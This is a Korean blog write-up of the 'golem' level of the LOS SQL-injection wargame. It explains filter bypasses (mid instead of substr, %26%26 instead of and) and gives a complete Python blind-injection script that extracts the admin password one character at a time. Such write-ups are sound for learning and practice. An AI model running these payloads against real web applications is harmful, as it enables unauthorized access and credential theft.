11. LOS - golem
2018. 8. 8. 13:04ㆍWarGame/LOS
LOS 11번 문제 golem입니다.
이전것들과 달라진 점들을보면
or 하고 and는 원래 필터링이 먹혔었고, substr이 필터링이 먹었군요..
구글링을 해보니 substr = mid 로 가능하다고 합니다.
and가 필터링을 먹는 경우는 and = %26%26
페이로드 입니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 | import requests import string num_alpha = string.digits + string.ascii_letters password = "" #find length passwd resetURL = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php" for i in range(1,20) : try : URL = resetURL payload = "?pw=1' || id like'admin' %26%26 LENGTH(pw) like "+str(i)+"%23" URL += payload #input your cookie(grin) cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11") response = requests.get(URL, cookies = cookies) print("[O] \n" + str(i) + ". connect success!!") except : print("[X] Error Code...OTL") if response.text.find ("</h2>") > 0 : print("passwd's length is : " + str(i) + "(grin)") break #password LENGTH for i in range(1, 9) : #ord("0") = 48 & ord("Z") = 90 for j in num_alpha : URL = resetURL payload = "?pw=1' || id like'admin' %26%26 ascii(mid(pw,"+ str(i) +", 1)) like "+ str(ord(j))+"%23" URL += payload #input your cookie(grin) cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11") response = requests.get(URL, cookies = cookies) if response.text.find ("</h2>") > 0 : password += chr(ord(j)) print (str(i) + "'s password is : " + chr(ord(j))) break #when you find password? exploit!! print(password) URL = resetURL payload = "?pw=" + password URL += payload #input your cookie(grin) cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11") response = requests.get(URL, cookies = cookies) print (response.text) | cs |
'WarGame > LOS' 카테고리의 다른 글
| 13. LOS - bugbear (0) | 2020.11.30 |
|---|---|
| 12. LOS - darknight (0) | 2018.08.09 |
| 10. LOS - skeleton (0) | 2018.08.07 |
| 9. LOS - vampire (0) | 2018.08.06 |
| 8. LOS - troll (0) | 2018.08.05 |